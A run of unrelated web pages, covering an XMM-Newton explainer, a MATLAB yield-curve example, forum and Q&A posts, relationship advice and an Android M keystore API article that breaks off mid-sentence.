don’t know: "I'm really low-key a nerd. I like learning about shit, all day, every day. I read, I watch YouTube, I graduated from YouTube University. Everything from my business even down to how to organize. I like to organize shit; that calms me down. I'm a Christian, even though you may not look at me and see, I'm very much heavy on the God." I’m going to be the next: "Female rap mogul." Follow Armani Caesar on SoundCloud and Instagram. "Simply Done" featuring Benny The Butcher "Palm Angels" Westside Gunn's "Lil Cease" featuring Armani Caesar The Liz
global_05_local_5_shard_00002591_processed.jsonl/40013
NASA Insignia Imagine the Universe! Artist's Conception of XMM Artist's impression of the XMM-Newton spacecraft. (Credit: ESA, illustration by Ducros) XMM-Newton has has been a prime tool for astronomers studying black holes, star formation and much more. XMM, short for X-ray Multi-Mirror Mission, was built primarily by the European Space Agency (ESA) and was launched December 10, 1999. XMM was designed to complement the Chandra Observatory, which launched just a few months before XMM. For example, Chandra's sensitive cameras produce sharp images of newborn stars and supernova remnants. XMM's huge collecting area, in turn, captures enough X-ray photons to reveal the temperature and velocity of the gas in these objects. X-ray photons enter the telescopes and bounce off the mirrors at a shallow angle towards instruments several meters away at the other end of the satellite. For two of the telescopes, half of the incoming photons are directed to cameras similar to the ones installed on Chandra. In this way, XMM generates images of the X-ray sources it observes. The other half of the incoming photons (and all of the photons on the third telescope) go directly to a device that analyzes the "colors" of the X-rays, producing X-ray spectra of the objects observed by the telescope. The Instrumentation In total, XMM has two telescopes that produce X-ray images and spectra (called the European Photon Imaging Cameras), one telescope dedicated completely to spectra (the Reflection Grating Spectrometer) and one optical-UV telescope (the Optical Monitor). XMM's three advanced X-ray telescopes, each with 58 high-precision nested mirrors, gives XMM a total X-ray collecting area of nearly the size of a tennis court - yet the telescopes themselves are only 30 centimeters wide. Sound impossible? The secret is in the design. image of the wafer-thin mirrors Image of wafer-thin mirrors used for X-ray mirrors like the ones used on XMM-Newton. (Credit: NASA) Each sleek, barrel-shaped telescope has 58 wafer-thin mirrors curved into cylinders and nested within each other like Russian dolls. Each mirror sits 25 microns from its neighbor, about a quarter the width of a human hair. The large collecting area offered by these three telescopes combined allows observations of millions of X-ray sources. But what excites astronomers most is the capacity (due to the spacecraft's highly eccentric orbit) to make long and uninterrupted observations with unprecedented sensitivity. With XMM astronomers are able to peer into deep space and observe details of very hot objects created when the universe was very young. XMM's Optical Monitor is like a scaled-down version of the Hubble Space Telescope. The telescope has a 30-centimeter aperture, which means the viewing area is 30-cm wide. But because it's above the atmosphere, the telescope has the power of a 4-meter-wide earth-bound telescope. This telescope is handy for viewing the optical and UV counterparts of X-ray sources. For example, the gas and miscellaneous star-stuff that spirals into a black hole can glow in X-rays as well as optical and UV light. XMM can view this simultaneously across wavelengths, learning more about the bizarre physics behind a black hole. The Science Results Astronomers around the world are so excited about XMM because the satellite observes so many different types of objects and events. These include cosmic background X-ray radiation, elliptical galaxies and clusters of galaxies, normal and starburst galaxies, active galactic nuclei and quasars, stellar black holes, neutron stars, pulsars, supernova remnants, and even comets. Check out some of XMM's science highlights: Published: June 2001 Text Reviewed: September 2018
global_05_local_5_shard_00002591_processed.jsonl/40017
Project Positions Pune, Maharashtra Applications are invited for different project posts to be filled at NCCS under Establishment of A Pune Biotech Cluster, “Model Organisms to Human Disease". 2 years, 7 months. To Apply For the detailed specifications of the posts, the prescribed application format and other terms and conditions; please see the Advt.No.PMC/P08/2018 under Project Staff in Careers tab on the website ( Last date for receiving the applications by the Director, NCCS, Pune is 31.10.2018 For more information click here. Posted on . JavaScript is required to reveal this email address. Post a Job →
global_05_local_5_shard_00002591_processed.jsonl/40035
How to Find Your Facebook Page Without Being Logged In By David Weedmark You don't need to be logged into Facebook to find most people's pages. Using Facebook's Page Directory, you can find business, fan and personal pages, provided their security sections allow searches. In fact, you might be surprised just how much information on your page is visible to everyone, whether they have a Facebook account or not. You can also use the Facebook Page directory to find businesses, people and places. Step 1 Open a new Web browser window and go to If you are not signed in, the page displays a sign up form and promotional information about the benefits of Facebook, but no search field. Step 2 Scroll to the bottom of the page. You will see a list of links in the footer above the copyright notice. Click the "Pages" link to open the Facebook Pages directory. By default, this opens to the "Pages" tab for business pages and fan pages. Click the "Profile" tab if you want to find your personal profile page. You can also find a city's page by clicking the "Places" tab. Step 3 Type your page name in the "Search" field. Whether you are looking for your personal profile or a fan page, this should be the name you use for that page. For example, if you use a nickname instead of your first name on Facebook, type the nickname. Click "Search." Step 4 Scan the search results for your page. Business or fan pages are listed first, followed by personal profiles. If you don't see your page, click the "See More Results" link at the bottom of the list. Click your page name to open it. If it's a fan page, what you see is what people see if they have not liked your page. If it's a personal profile, this is what people see if they are not a Facebook friend.
global_05_local_5_shard_00002591_processed.jsonl/40073
The refinement of the Smart texture adds a sensitive element when used in the most sophisticated interiors and is ideal for solid colours and bolder patterns. Combined Back Texture: Smart (0A) Core: Chipboard Format: 2800×2070 Categories: , Available Thickness: 2800 x 2070 x 8 mm Single panels (from 1 to 9) Bundles (10 panels and multiple) 2800 x 2070 x 18 mm Single panels (from 1 to 19) Bundles (20 panels and multiple)
global_05_local_5_shard_00002591_processed.jsonl/40099
Main Content Fitting Interest Rate Curve Functions This example shows how to use IRFunctionCurve objects to model the term structure of interest rates (also referred to as the yield curve). This can be contrasted with modeling the term structure with vectors of dates and data and interpolating between the points (which can currently be done with the function prbyzero). The term structure can refer to at least three different curves: the discount curve, zero curve, or forward curve. The IRFunctionCurve object allows you to model an interest-rate curve as a function. This example explores using IRFunctionCurve to model the default-free term structure of interest rates in the United Kingdom. Three different forms for the term structure are implemented and are discussed in more detail later: • Nelson-Siegel • Svensson • Smoothing Cubic Spline with a so-called Variable Roughness Penalty (VRP) Choosing the Data The first question in modeling the yield curve is what data should be used. To model a default-free yield curve, default-free, option-free market instruments must be used. The most significant component of the data is UK Government Bonds (known as Gilts). Historical data is retrieved from the following site: Repo data is used to construct the short end of the yield curve. Repo data is retrieved from the following site: Note also that the data must be specified as a matrix where the columns are Settle, Maturity, CleanPrice, and CouponRate and that instruments must be bonds or synthetically converted to bonds. Market data for a close date of April 30, 2008, has been downloaded and saved to the following data file (ukdata20080430), which is loaded into MATLAB® with the following command: % Load the data load ukdata20080430 % Convert repo rates to be equivalent zero coupon bonds RepoCouponRate = repmat(0,size(RepoRates)); RepoPrice = bndprice(RepoRates, RepoCouponRate, RepoSettle, RepoMaturity); % Aggregate the data Settle = [RepoSettle;BondSettle]; Maturity = [RepoMaturity;BondMaturity]; CleanPrice = [RepoPrice;BondCleanPrice]; CouponRate = [RepoCouponRate;BondCouponRate]; Instruments = [Settle Maturity CleanPrice CouponRate]; InstrumentPeriod = [repmat(0,6,1);repmat(2,31,1)]; CurveSettle = datenum('30-Apr-2008'); Fit Nelson-Siegel Model to Market Data The Nelson-Siegel model proposes that the instantaneous forward curve can be modeled with the following: This can be integrated to derive an equation for the zero curve (see [6] for more information on the equations and the derivation): See [1] for more information. The IRFunctionCurve object provides the capability to fit a Nelson Siegel curve to observed market data with the fitNelsonSiegel method. The fitting is done by calling the Optimization Toolbox™ function lsqnonlin. The fitNelsonSiegel method has required inputs for Curve Type, Curve Settle, and a matrix of instrument data. Optional input arguments, specified in name-value pair argument, are: • IRFitOptions structure: Provides the capability to choose which quantity to be minimized (price, yield, or duration weighted price) and other optimization parameters (for example, upper and lower bounds for parameters). • Curve Compounding and Basis (day-count convention) • Additional instrument parameters, Period, Basis, FirstCouponDate, and so on. NSModel = IRFunctionCurve.fitNelsonSiegel('Zero',CurveSettle,... Fit Svensson Model A very similar model to the Nelson-Siegel model is the Svensson model, which adds two additional parameters to account for greater flexibility in the term structure. This model proposes that the forward rate can be modeled with the following form: As above, this can be integrated to derive an equation for the zero curve: See [2] for more information. Fitting the parameters to this model proceeds in a similar fashion to the Nelson-Siegel model using the fitSvensson method. SvenssonModel = IRFunctionCurve.fitSvensson('Zero',CurveSettle,... Fit Smoothing Spline The term structure can also be modeled with a spline, specifically, one way to model the term structure is by representing the forward curve with a cubic spline. To ensure that the spline is sufficiently smooth, a penalty is imposed relating to the curvature (second derivative) of the spline: where the first term is the difference between the observed price P and the predicted price, P_hat, (weighted by the bond's duration, D) summed over all bonds in the data set, and the second term is the penalty term (where lambda is a penalty function and f is the spline). See [3], [4], [5] below. There have been different proposals for the specification of the penalty function lambda. One approach, advocated by [4], and currently used by the UK Debt Management Office, is a penalty function of the following form: The parameters L, S, and mu are typically estimated from historical data. The IRFunctionCurve object can be used to fit a smoothing spline representation of the forward curve with a penalty function using the method fitSmoothingSpline. Required inputs, like for the methods above, are a CurveType, CurveSettle, Instruments matrix, and a function handle (Lambdafun) containing the penalty function. The optional parameters are similar to fitNelsonSiegel and fitSvensson. % Parameters chosen to be roughly similar to [4] below. L = 9.2; S = -1; mu = 1; lambdafun = @(t) exp(L - (L-S)*exp(-t/mu)); % Construct penalty function t = 0:.1:25; % Construct data to plot penalty function y = lambdafun(t); title('Penalty Function for VRP Approach') VRPModel = IRFunctionCurve.fitSmoothingSpline('Forward',CurveSettle,... Use Fitted Curves and Plot Results Once a curve is constructed, methods are used to extract the Forward and Zero Rates and the Discount Factors. This curve can also be converted into a RateSpec structure using the toRateSpec method. The RateSpec can then be used with many other functions in the Financial Instruments Toolbox™ PlottingDates = CurveSettle+20:30:CurveSettle+365*25; TimeToMaturity = yearfrac(CurveSettle,PlottingDates); NSForwardRates = NSModel.getForwardRates(PlottingDates); SvenssonForwardRates = SvenssonModel.getForwardRates(PlottingDates); VRPForwardRates = VRPModel.getForwardRates(PlottingDates); hold on title('UK Instantaneous Nominal Forward Curve') xlabel('Years Ahead') legend({'Nelson Siegel','Svensson','VRP'}) Compare with this Link This link provides a live look at the derived yield curve published by the UK This example is based on the following papers and journal articles: [1] Nelson, C.R., Siegel, A.F., (1987), "Parsimonious Modelling of Yield Curves." Journal of Business. 60, pp 473-89. [2] Svensson, L.E.O. (1994), "Estimating and Interpreting Forward Interest Rates: Sweden 1992-4." International Monetary Fund, IMF Working Paper, 1994/114. [3] Fisher, M., Nychka, D., Zervos, D. (1995), "Fitting the Term Structure of Interest Rates with Smoothing Splines." Board of Governors of the Federal Reserve System, Federal Reserve Board Working Paper, 95-1. [4] Anderson, N., Sleath, J. (1999), "New Estimates of the UK Real and Nominal Yield Curves." Bank of England Quarterly Bulletin. November, pp 384-92. [5] Waggoner, D. (1997), "Spline Methods for Extracting Interest Rate Curves from Coupon Bond Prices." Federal Reserve Board Working Paper, 97-10. [6] "Zero-Coupon Yield Curves: Technical Documentation." BIS Papers No. 25, October 2005. [7] Bolder, D.J., Gusba,S (2002), "Exponentials, Polynomials, and Fourier Series: More Yield Curve Modelling at the Bank of Canada." Working Papers 02-29, Bank of Canada. [8] Bolder, D.J., Streliski, D (1999), "Yield Curve Modelling at the Bank of Canada." Technical Reports 84, Bank of Canada. See Also | | | Related Examples More About External Websites
global_05_local_5_shard_00002591_processed.jsonl/40111
I am an Associate Professor in the Department of Government in the School of Public Affairs at American University. I specialize in comparative politics, the political economy of development, and political behavior. My research investigates two broad questions: (1) how do different sources of revenue (such as taxes, natural resource rents, and aid) shape the political and social behavior of citizens; and (2) what are the causes of group-based divisions in society and how can they be mitigated?  I undertake large-scale field research projects that employ experimental and quasi-experimental methods for causal inference and that involve the collection of extensive original survey and behavioral data. My research is based on work in a diverse group of countries, including Indonesia, Colombia, Uganda, the Democratic Republic of the Congo (DRC), and Lebanon. I am currently a member of the Evidence in Governance and Politics network (EGAP); a co-convener of the Northeast Workshop in Empirical Political Science; and a non-resident fellow at the Center for Global DevelopmentI received my Ph.D. in political science from Columbia University.
global_05_local_5_shard_00002591_processed.jsonl/40136
Jump to content • Content Count • Joined • Last visited Community Reputation 0 Neutral About nemiahm • Rank Just Startin' Profile Information • Gender Not Telling • Registered Products 1. Thanks. He is not my style but he is a world class bassist... and if he uses it, that says a lot! 2. Does anyone have experience or thoughts on the L3M as a bass guitar stage monitor? I am about to buy a Helix and I would like a nice reference/stage monitor to go with it. My expectation is to have similar performance as a moderately powered 2-10" or 1-15" bass cabinet. I have been playing with my guitarist's Helix and some 3rd party bass cabinet IR's. After a set, we tried the Helix with the bass patches we created and the sound/tone was very impressive through the PA. His L2M did surprisingly well for it's size... but I would like comfortable headroom. On paper, the L3M looks great! I am curious of the L3M user's thoughts and experience before I make any decisions. • Create New...
global_05_local_5_shard_00002591_processed.jsonl/40141
Re: [dev] Pandoc replacement that sucks less From: Lukáš Hozda <> Date: Mon, 29 Apr 2019 02:03:14 +0200 for documents, I am currently using troff + mupdf + a small program to watch file changes. Whenever I spot a change of my source file, I rebuild the PDF from the troff and send SIGHUP to mupdf, which will reload the document. It is reasonably lightweight and it does meet your requirements - files in git, any editor (that supports troff), and worrying about styling later. Admittedly, there are likely tons of better solutions, for example embedding images in troff seems to be a nightmare to my limited knowledge. But my workflow may serve as some inspiration. Received on Mon Apr 29 2019 - 02:03:14 CEST This archive was generated by hypermail 2.3.0 : Mon Apr 29 2019 - 02:12:07 CEST
global_05_local_5_shard_00002591_processed.jsonl/40149
Five a Side Football A weekly kick around, lots of fun! Mondays 8pm at Tilsley Park. Ages 16 and up. Email [email protected] It's great to have a regular form of exercise; committing one night a week to playing football rather than watching it works for me and improves my fitness! There's a good mix of people, we find all sorts of connections are made, such as friends from work. It's a relaxed way of getting to know people.  Gavin Barber
global_05_local_5_shard_00002591_processed.jsonl/40157
Night Ranger: hit me up on Facebook | Bleader Night Ranger: hit me up on Facebook Sign up for our newsletters Subscribe First Journey gets a new lead singer through YouTube. Now Anthrax hires a dude who sent them a MySpace message. I'm just waiting on one more kinda-cool kinda-dumb social-networking-rock-star-hiring event so I can announce the "semi-washed up 80s rock bands are the new teenage emo chicks" trend.  Also, do you want to invest in my planned biopic of new Journey front man Arnel Pineda? It's going to be a lot like Rock Star but with more of Neal Schon getting his quest for a new singer repeatedly derailed by his friend IMing him links to celebrity nip slips. Box office gold! Add a comment
global_05_local_5_shard_00002591_processed.jsonl/40171
Grado Labs Built Wireless Headphones for Audiophiles and Deep Listeners Do you want sonic quality and clarity in your wireless headphones? If you’re looking for a sophisticated set of headphones that have been designed to create sonic bliss without the hassle of cords, then you want to get ears on some Grado Labs GW100 wireless headphones. For audiophiles and deep listeners alike, these babies can pump the volume clear without the wires. Grado Labs said they took their time in building a quality set of phones for its customers. grado headphones black Grado Labs used its signature Grado drivers in the GW100s. The speakers are the same used in the wired model, which are finely tuned to their specific enclosures, according to the company. The wireless pair are no different. The drivers are configured to pair with their enclosures too. grado wireless headphones in hand Grado Labs lays claim to the world’s first open-back Bluetooth pair of headphones. They say the headphones can minimize sound escape by up to 60 percent in the GW100 because they are so finely configured and developed for sound. Check it out
global_05_local_5_shard_00002591_processed.jsonl/40179
Marriage Issues Forum Marriage seems wonderfully endearing to the single individual who has never married, and perhaps to the divorced individual who hankers for something to arrest their longing for companionship or sexual release, but marriage for practically all of us is very a challenging perform at occasions. (And I can say this even as a representative of my wife!). We carry so a lot of ourselves into our marriages – which is the two a good and a bad point. This session looks at how couples should resolve conflict in marriage How To Get Your Ex Girlfriend Back My general advice to all couples is to give up your individual rights for the sake of your spouse. That is the first step towards personal change. When your spouse can see the changes in you, he or she will begin to change, too. Then and only then can there be any hope of saving your marriage. The first attitude we should adopt is one of hope. Hope that it is possible, and that you can save your marriage and live a happy and loving marriage. As it is said that 80% of success begins with your psychology and 20% with what you actually do, then, to set yourself up for success, most your investment should be with your psychology and the rest should be doing the right things, and following the right advice. When you look back at the good times in your life and you miss the excitement and enthusiasm you want it back. But how do you get there from here? It has been such a long time since feeling that way, the roaring flames of romance has long since been reduced to mere smoldering embers. Difficulties In Love Marriage Find solutions where both people get what they want. Compromise can leave people foaming at the mouth because it can mean that they have to sacrifice what they want to accommodate their partner. Be willing to think outside the box and find new ways forward to accommodate each partner’s wishes. It is really important for both partners to find the root of conflict so that they can have a clear visualization of ‘what is going on’ and ‘from where it all came’. Marriage Conflict Resolution Tips include remaining calm, reasonable and rational. When one is going through conflicts, there can be all sorts of feelings flying around. So where can you go to learn these skills? Both marriage counseling and relationship psychoeducation for couples have demonstrated effectiveness. Successful approaches include, learning proven skills for communication and confiding effectively, resolving misunderstanding and conflict productively, healing old relationship wounds permanently and increasing intimacy successfully. An Important Key Is?, This all-important key to saving your marriage is to discern all areas of unfulfilled expectations that each of you have towards the other. Open the channels of communication. Talk it through, express you thoughts and feelings towards each other. Ask one another what each expects of the other in any given area of your marriage. Previous Marriage Crisis Post Next Marriage Problems Post
global_05_local_5_shard_00002591_processed.jsonl/40183
I'm new to the Math StackExchange, but I am puzzled by the downvotes on this question: Am I properly simplifying this geometric progression? I tried to be as clear as possible, to show that I had put some effort into finding a solution, and to be as specific as I knew how to. I've received some number of downvotes without comment, and so I do not know what I might have done wrong. Therefore, I cannot assume I will not make the same mistake again. | | • 2 $\begingroup$ I have added (specific-question) tag, see the tag-info. If you want to ask about a more general issue and the linked question was meant just as an example, feel free to remove the tag. $\endgroup$ – Martin Sleziak Feb 24 '19 at 20:32 • 9 $\begingroup$ I just looked at your question and I don't see any particular reason why it should get any down votes. To me, it looks like a fairly well written & appropriate type question for this site. There are, IMHO, quite a few more poorly written questions that get quite a few up votes & no down votes. Also, note you only got one down vote, so unless this person provides an explanation, you can't know for sure what their issue is. In general, getting a down vote (especially if it's only one) doesn't necessarily mean you did anything specifically wrong. $\endgroup$ – John Omielan Feb 24 '19 at 21:48 • 3 $\begingroup$ It's fine. You gave all the relevant information and made it clear what you were asking. I think there are one or two users who downvote any piece of maths with a mistake in, but it someone is asking "Is this right?" it seems reasonable to expect possible mistakes and not downvote them! I don't think you should worry about it. $\endgroup$ – timtfj Feb 24 '19 at 23:57 • 4 $\begingroup$ "puzzled by the downvotes on this question." Right now, there seems to be only one downvote. Perhaps you should edit your post to say "downvote"? $\endgroup$ – Joel Reyes Noche Feb 25 '19 at 1:56 • 3 $\begingroup$ @JoelReyesNoche I don't have the reputation to see the vote breakdown, so I wasn't aware it was only a single downvote. Sorry about that! $\endgroup$ – Bryan Porter Feb 25 '19 at 1:57 • 4 $\begingroup$ I agree that the question is fine, but one possible trigger for the down-vote is that you use an asterisk for multiplication. It's not the that the question is unclear in any way, but it does look slightly less professional. Instead, you could use \times or (often better) \cdot to make everything look more slick. It would be IMHO ridiculous to down-vote on that point alone, but that's about my best guess. $\endgroup$ – Theo Bendit Feb 28 '19 at 12:05 • $\begingroup$ Thank you for the feedback, I wasn't aware of that markup. I've edited the original question to reflect your feedback. $\endgroup$ – Bryan Porter Mar 1 '19 at 19:06 • 1 $\begingroup$ There a lot of mean people that downvote decent posts just for the pleasure of being obnoxious. Welcome to math people world. I've had good posts downvoted for no reason. $\endgroup$ – user630964 Mar 5 '19 at 22:22 You must log in to answer this question. Browse other questions tagged .
global_05_local_5_shard_00002591_processed.jsonl/40184
How many words with or without meaning can be made from the letters of the word CONCENTRATIONS by taking $4$ letters at a time? There are $14$ letters total present in the word. $4$ letters can be picked in $14\choose 4$ ways. $4$ letters can be arranged in $4!$ ways. So ideally answer has to be ${14\choose 4} * 4!$. But I know this answer is wrong because some letters are repeating. How do I solve this then? I appreciate any help. • 2 $\begingroup$ Just a note, ${14 \choose 4}$ is the same thing as $14!/4!(14-4)!$, So when you multiply by 4! you are really calculating $14! /10!$. $\endgroup$ – h94 Dec 20 '16 at 18:49 • $\begingroup$ Answer is $4436$ $\endgroup$ – Kiran Dec 20 '16 at 18:50 See a similar question here. You can search for "number of arrangements using letters of word" in this website and find many similar problems here. You can also use this tool where you can enter any word and it generates such questions and solutions. For the word CONCENTRATIONS, it gave answer as 4436 which is given below enter image description here • $\begingroup$ sorry, i thought it will be useful for him. can delete, if it is a violation. pl let me know. i find this tool useful while practicing similar questions and hence posted. $\endgroup$ – Kiran Dec 20 '16 at 19:36 • $\begingroup$ thanks. is it possible for me to now move my answer to "community wiki" ? any moderators, please help $\endgroup$ – Kiran Dec 20 '16 at 19:44 • $\begingroup$ Yes you can: click on edit (to the lower left of your post; that allows you to edit the answer field, look for a very small box that you can click, and to the right of the little box, you,ll see "make this community wiki" (at the very least, you'll see "community wik" to the right of the box, and clicking the box makes the post a "community wiki" post. $\endgroup$ – amWhy Dec 20 '16 at 19:47 • $\begingroup$ i did so, thanks $\endgroup$ – Kiran Dec 20 '16 at 19:49 • 1 $\begingroup$ Thanks for you contribution, @Kiran ! :-) $\endgroup$ – amWhy Dec 20 '16 at 19:52 There are $9$ unique letters: C, O, N, E, T, R, A, I, S. Of those letters, N has multiplicity $3$ (meaning it appears three times), C, T, and O have multiplicity $2$, and all other letters appear only once. Here's a lengthy, but elementary approach. Any $4$ letter word you make here has one of the following forms: 1) $4$ unique letters, e.g. CONE 2) A pair of same letters, and $2$ distinct letters (distinct from each other and the pair), e.g. TOTE 3) Two pairs of distinct letters e.g. COCO 4) Three of the same letter, and a fourth distinct letter e.g. NANN Obviously, none of these types overlap, and no other words exist outside of these types (you have no letters of multiplicity $4$, for example, so no words of one letter), so you just need to calculate how many exist for each type, which is much easier, and then add them together. Try and see if you can do this yourself. EDIT: I should note that this will give you the same answer Kiran stated, $4436$, if that helps. | cite | improve this answer | | Your Answer
global_05_local_5_shard_00002591_processed.jsonl/40189
How the story of God, Adam, Eve and the Serpent relates to an education system Depiction of the original sin by Jan Brueghel de Oude and Peter Paul Rubens The Bible on its own is a very interesting and strange book, let alone the stories that lie within. One of the many interesting stories is the story of God, Adam, Eve and the Serpent. It’s arguably the first story in the Bible, depending on how one defines a story. It has a beginning, a climax and an end. This story, however, is not just a story. Like every other story in the Bible I believe it has a variety of angles to be looked at and if deconstructed and analysed into bits of pieces, one realises how significant and deep it can be. The story starts off with God making a Man, Adam, from dust. He goes on and makes a Woman, Eve, from Adam’s rib. However, before the making of the Woman, God commands Adam not to eat from the tree of knowledge of good and evil. He does it with his reason, and the reason is that whosoever eats from the tree shall surely die. Later on the story Eve is tempted by a serpent. The serpent asked Eve a very interesting question; “Did God really say, ‘You must not eat from any tree in the garden’?” There’s nowhere in the Bible where God directly tells Eve not to eat from the tree of knowledge of good and evil and one could argue that the serpent took advantage of that. In my book ‘Human Education: The Voyage of Discovery’, I talk about the basis of education; a series of steps taken to acquire or provide facts, information, descriptions or skills from a particular start and delivering them, making them known to a particular end. When a teacher gives a lecture about photosynthesis, the teacher is simply transferring certain information or facts from themselves or from a book to their learners. The teacher will set a standard test for the learners to test their knowledge of what they have been taught. Those who were educated about photosynthesis will certainly answer whatever they have been taught, correctly. Learners who would’ve been absent in this photosynthesis class won’t be able to answer the questions unless they studied at home or anywhere else or unless they guess the correct answers. The garden of Eden, God, Adam, Eve and the serpent, is a simple demonstration of an education system. God is the teacher in this story. Adam and Eve are the learners. When God’s class was in session Eve was not in class. Eve never received the lesson from God, that tree of knowledge of good and evil results in death. When the serpent approaches Eve, it was like going into an exam room and coming across a question that starts like this; “Did the teacher really say…” It’s a very strange connection to make but we have to consider the fact that as far as we know, the information was repeatedly transferred to Adam, not Eve. Even though Adam took the command, he later saw that Eve was still alive after eating from the tree, and so he went on to eat too. There’s education, which is the process of moving information from point A to point B, then there’s the education system which consists of the things that make and/or break the process. There are a number of ways education systems can be disturbed and there are three fundamental entities that make up an education system; the home, the community and the school. If the home teaches the child that A is equals to 3 and the community tells the child that A is equals to 4 and the school tells the child that A is equals to 0, the child will end up a confused soul. In any education system, the teacher as the last line of leadership because they are the closest to the learner is often first to blame when something bad happens to the learner – this something bad could be something that the teacher could have dealt with. The teacher in this case (God) shouldn’t have trusted Adam to pass on the teaching to another student as a student on their own. On the other hand Adam disobeyed God when he saw that Eve didn’t die from eating from the tree of knowledge of good evil. As far as things seem, the cycle was going just fine, Adam was following God’s order and arguably, Eve understood and/or believed Adam. The cycle broke when the serpent said A is not what God says A is or what Adam says it is. That “You shall surely die” from God is more like, you shall surely fail the exam if you don’t follow my instructions. For instance, whether it’s at home, school or around the community, there’s always some teaching(s) one receives, and we’re told to strictly follow them. It’s like; studying for the wrong content for your exam shall surely get you killed. About Mduduzi Mbiza 111 Articles
global_05_local_5_shard_00002591_processed.jsonl/40205
Please note that for all submissions, except microreviews, we use the Scholastica submission system. You can submit your manuscript files by clicking the button below. Before submitting, please read our manuscript preparation guidelines. In case, you want to submit a manuscript previously rejected by a different high-impact journal, please consider our Fast Track option. If you experience problems during the submission process please contact us directly at Submit to Microbial Cell Terms and conditions: With the submission of this manuscript, the authors confirm via the corresponding author that the submitted paper is original, has not already been published in whole or in substantial part elsewhere, and does not infringe the copyright or other rights of any other person(s). Furthermore, they certify that it is not currently under consideration by any other journal. Should the submitted manuscript be accepted for publication in Microbial Cell in its original or in a revised form, the authors hereby agree to pay the applicable publication fee to SHARED SCIENCE PUBLISHERS OG as specified in the “Editorial Policies” and grant SHARED SCIENCE PUBLISHERS OG to be the original publisher of the manuscript. In the case of a possible publication of the manuscript in Microbial Cell, the authors agree their paper to be published as an open access article under the terms of the Creative Commons Attribution License. The authors will retain the copyright of the paper but agree not to grant any other publisher the exclusive right to publish the paper again elsewhere.
global_05_local_5_shard_00002591_processed.jsonl/40219
AWS Marketplace AWS Marketplace: IT marketplace AWS Marketplace Birds of a feather flock together! Products that are often seen with AWSMarketplace, descending order of frequency: Product seen with Prefix Name Description AWS CloudFormation infra as code (decl) AWS Data Exchange dataset marketplace Amazon Elastic Compute Cloud (EC2) virtual machine Amazon Simple Storage Service (S3) object storage Amazon WorkSpaces virtual desktop AWS CloudTrail operations planes audit log AWS Cost Explorer cost visualization AWS Budgets budget management Amazon SageMaker ML IDE Amazon API Gateway API gateway Products that are related in Moca: Related products Prefix Name Description Amazon Elastic Container Registry (ECR) container registry AWS Marketplace IT marketplace AWS Serverless App Repository (SAR) serverless marketplace AWS Service Catalog private IT marketplace
global_05_local_5_shard_00002591_processed.jsonl/40253
Convert Table to Div in dreamweaver using Regex Tables can’t do various things which can be done using divs. In this tutorial I will explain to you how to convert your table based structure into div based structure while giving unique id or class to each of those divs. This can be done via search and replace too right? well there are few […] How to remove height / width using regex from image in Dreamweaver This tutorial is meant to give an idea to the developers about how they can use regex to remove or replace certain code from their source code using regex feature in adobe dreamweaver. For instance, consider an example page with this type of code in it repeating again and again on the entire page: <img […] Using regular expressions in Dreamweaver Do you know you can use regular expressions in dreamweaver? (don’t kill me if you already knew about dreamweaver regex option) Some developers who already use dreamweaver ask me about some tool to use regexp on their code. So answer to them is sometimes: you can already use regular expression in dreamweaver! (another good alternate […] How to uninstall Adobe (cs4) on mac os completely Unlike windows, mac don’t offer a install / uninstall program utility. So users usually find it confusing how to uninstall the applications from mac os completely. This tutorial will discuss how to uninstall Adobe cs4 masters collection from your mac os. In my case, I tried uninstalling Adobe masters collection cs4 from my mac os […]
global_05_local_5_shard_00002591_processed.jsonl/40260
Keystore redesign in Android M Android M has been announced, and the first preview builds and documentation are now available. The most visible security-related change is, of course, runtime permissions, which impacts almost all applications, and may require significant app redesign in some cases. Permissions are getting more than enough coverage, so this post will look into a less obvious, but still quite significant security change in Android M -- the redesigned keystore (credential storage) and related APIs. (The Android keystore has been somewhat of a recurring topic on this blog, so you might want to check older posts for some perspective.) New keystore APIs Android M officially introduces several new keystore features into the framework API, but the underlying work to support them has been going on for quite a while in the AOSP master branch. The most visible new feature is support for generating and using symmetric keys that are protected by the system keystore. Storing symmetric keys has been possible in previous versions too, but required using private (hidden) keystore APIs, and was thus not guaranteed to be portable across versions. Android M introduces a keystore-backed symmetric KeyGenerator, and adds support for the KeyStore.SecretKeyEntry JCA class, which allows storing and retrieving symmetric keys via the standard JCA API. To support this, Android-specific key parameter classes and associated builders have been added to the Android SDK. Here's how generating and retrieving a 256-bit AES key looks when using the new M APIs: // key generation KeyGenParameterSpec.Builder builder = new KeyGenParameterSpec.Builder("key1", KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT); KeyGenParameterSpec keySpec = builder .setUserAuthenticationValidityDurationSeconds(5 * 60) KeyGenerator kg = KeyGenerator.getInstance("AES", "AndroidKeyStore"); SecretKey key = kg.generateKey(); // key retrieval KeyStore ks = KeyStore.getInstance("AndroidKeyStore"); KeyStore.SecretKeyEntry entry = (KeyStore.SecretKeyEntry)ks.getEntry("key1", null); key = entry.getSecretKey(); This is pretty standard JCA code, and is in fact very similar to how asymmetric keys (RSA and ECDSA) are handled in previous Android versions. What is new here is, that there are a lot more parameters you can set when generating (or importing a key). Along with basic properties such as key size and alias, you can now specify the supported key usage (encryption/decryption or signing/verification), block mode, padding, etc. Those properties are stored along with the key, and the system will disallow key usage which doesn't match the key's attributes. This allows insecure key usage patterns (ECB mode, or constant IV for CBC mode, for example) to be explicitly forbidden, as well as constraining certain keys to a particular purpose, which is important in a multi-key cryptosystem or protocol. Key validity period (separate for encryption/signing and decryption/verification) can also be specified. Another major new feature is requiring use authentication before allowing a particular key to be used, and specifying the authentication validity period. Thus, a key that protects sensitive data, can require user authentication on each use (e.g., decryption), while a different key may require only a single authentication per session (say, every 10 minutes). The newly introduced key properties are available for both symmetric and asymmetric keys. An interesting detail is that apparently trying to use a key is now the official way (Cf. the Confirm Credential sample and related video) to check whether a user has authenticated within a given time period. This quite a roundabout way to verify user presence, especially if you app doesn't make use of cryptography in the first place. The newly introduced FingerprintManager authentication APIs also make use of cryptographic objects, so this may be part of a larger picture, which we have yet to see. Keystore and keymaster implementation On a high level, key generation and storage work the same as in previous versions: the system keystore daemon provides an AIDL interface, which framework classes and system services use to generate and manage keys. The keystore AIDL has gained some new, more generic methods, as well support for a 'fallback' implementation but is mostly unchanged. The keymaster HAL and its reference implementation have, however, been completely redesigned. The 'old' keymaster HAL is retained for backward compatibility as version 0.3, while the Android M version has been bumped to 1.0, and offers a completely different interface. The new interface allows for setting fine-grained key properties (also called 'key characteristics' internally), and supports breaking up cryptographic operations that manipulate data of unknown or large size into multiple steps using the 